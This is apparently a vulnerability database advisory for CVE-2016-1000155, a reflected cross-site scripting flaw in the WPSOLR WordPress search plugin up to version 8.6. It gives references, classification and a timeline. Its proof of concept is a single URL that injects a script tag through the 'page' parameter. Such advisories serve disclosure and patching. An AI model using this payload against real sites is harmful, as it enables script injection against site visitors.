WPSOLR <= 8.6 – Unauthenticated Reflected Cross-Site Scripting (XSS) | CVE 2016-1000155 | Plugin Vulnerabilities

Description

The WPSOLR – Elasticsearch and Solr search WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.

Proof of Concept

http://www.example.com/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page="><script>alert(1);</script><"

Affects Plugins

wpsolr-search-engine

Fixed in 8.7

References

CVE

CVE-2016-1000155

URL

http://www.vapidlabs.com/wp/wp_advisory.php?v=303

URL

https://www.openwall.com/lists/oss-security/2016/04/12/8

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Submitter

ethicalhack3r

Submitter twitter

Verified

Yes

WPVDB ID

1b91fefc-341b-45d4-84c2-b31c137347e7

Timeline

Publicly Published

2016-04-12 (about 10 years ago)

Added

2016-04-14 (about 10 years ago)

Last Updated

2020-09-22 (about 5 years ago)

Other

Published

Title

Published

2025-03-25

Title

Quick Interest Slider <= 3.1.5 - Contributor+ Stored XSS

Published

2025-01-24

Title

LearnPress – WordPress LMS Plugin < 4.2.7.5.1 - Authenticated (LP Instructor+) Stored Cross-Site Scripting via Lesson Name

Published

2025-04-17

Title

WPAMS <= 44.0 (17-08-2023) - Unauthenticated Stored Cross-Site Scripting

Published

2024-06-05

Title

Image Hover Effects for Elementor with Lightbox and Flipbox <= 3.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via _id, oxi_addons_f_title_tag, and content_description_tag Parameters

Published

2014-12-22

Title

WordPress Backup to Dropbox 4.0 - Reflected XSS